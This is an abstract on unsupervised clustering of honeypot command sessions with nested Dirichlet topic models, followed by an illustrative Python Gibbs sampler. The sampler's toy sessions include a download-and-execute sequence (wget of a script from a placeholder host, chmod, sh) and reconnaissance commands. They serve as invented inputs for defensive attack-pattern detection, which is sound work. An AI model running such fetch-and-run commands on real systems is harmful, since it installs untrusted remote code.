Nested Dirichlet models for unsupervised attack pattern detection in honeypot data

Cyber-systems are under near-constant threat from intrusion attempts. Attack types vary, but each attempt typically has a specific underlying intent, and the perpetrators are typically groups of individuals with similar objectives. Clustering attacks that appear to share a common intent is very valuable to threat-hunting experts. This article explores Dirichlet distribution topic models for clustering terminal session commands collected from honeypots, which are special network hosts designed to entice malicious attackers. The main practical implications of clustering the sessions are twofold: finding similar groups of attacks, and identifying outliers. A range of statistical models is considered, each adapted to the structure of command-line syntax. In particular, the concepts of primary and secondary topics, and then of session-level and command-level topics, are introduced into the models to improve interpretability. The proposed methods are further extended in a Bayesian nonparametric fashion to allow unboundedness in the vocabulary size and in the number of latent intents. The methods are shown to discover an unusual MIRAI variant which attempts to take over existing cryptocurrency coin-mining infrastructure and which is not detected by traditional topic-modelling approaches.
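To make the idea of a session-level topic concrete, the following is a minimal sketch, not the article's nested model. It assumes the simplest possible variant: each session carries a single latent topic, the number of topics and the vocabulary are fixed in advance, and inference uses a collapsed Gibbs sampler for a Dirichlet-multinomial mixture. The function names, the hyperparameters `alpha` and `eta`, and the toy sessions are all hypothetical and chosen only for illustration.

```python
import math
import random
from collections import Counter

# Invented toy sessions (not real honeypot data): each is a list of commands.
TOY_SESSIONS = [
    ["wget http://example.invalid/bot.sh", "chmod +x bot.sh", "sh bot.sh"],
    ["wget http://example.invalid/bot.sh", "sh bot.sh"],
    ["uname -a", "cat /proc/cpuinfo", "free -m"],
    ["cat /proc/cpuinfo", "uname -a"],
]

def tokenize(session):
    """Flatten a session into whitespace-separated tokens."""
    return [tok for cmd in session for tok in cmd.split()]

def gibbs_cluster(sessions, n_topics=2, alpha=1.0, eta=0.1, n_iter=50, seed=0):
    """Assign one topic per session by collapsed Gibbs sampling.

    alpha: Dirichlet pseudo-count on the topic proportions (assumed value).
    eta:   Dirichlet pseudo-count on each topic's word distribution (assumed value).
    """
    rng = random.Random(seed)
    docs = [tokenize(s) for s in sessions]
    vocab_size = len({w for d in docs for w in d})

    # Random initial assignment, plus the count tables the sampler maintains.
    z = [rng.randrange(n_topics) for _ in docs]
    topic_sizes = [0] * n_topics                        # sessions per topic
    topic_words = [Counter() for _ in range(n_topics)]  # word counts per topic
    topic_totals = [0] * n_topics                       # tokens per topic
    for d, k in zip(docs, z):
        topic_sizes[k] += 1
        topic_words[k].update(d)
        topic_totals[k] += len(d)

    for _ in range(n_iter):
        for i, d in enumerate(docs):
            # Remove session i from its current topic.
            k_old = z[i]
            topic_sizes[k_old] -= 1
            topic_words[k_old].subtract(d)
            topic_totals[k_old] -= len(d)

            # Log-probability of each topic: prior term times the
            # Dirichlet-multinomial predictive of the session's tokens.
            log_p = []
            for k in range(n_topics):
                lp = math.log(topic_sizes[k] + alpha)
                seen = Counter()
                for j, w in enumerate(d):
                    lp += math.log(topic_words[k][w] + seen[w] + eta)
                    lp -= math.log(topic_totals[k] + j + vocab_size * eta)
                    seen[w] += 1
                log_p.append(lp)

            # Sample a new topic from the normalised probabilities.
            top = max(log_p)
            weights = [math.exp(lp - top) for lp in log_p]
            k_new = rng.choices(range(n_topics), weights=weights)[0]

            # Add session i back under its new topic.
            z[i] = k_new
            topic_sizes[k_new] += 1
            topic_words[k_new].update(d)
            topic_totals[k_new] += len(d)
    return z

labels = gibbs_cluster(TOY_SESSIONS)
print(labels)
```

The returned list holds one topic label per session, so sessions sharing a label form a candidate group of similar attacks, and a session that ends up alone in its topic is a candidate outlier. The nonparametric extensions described in the abstract would replace the fixed `n_topics` and fixed vocabulary assumed here.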
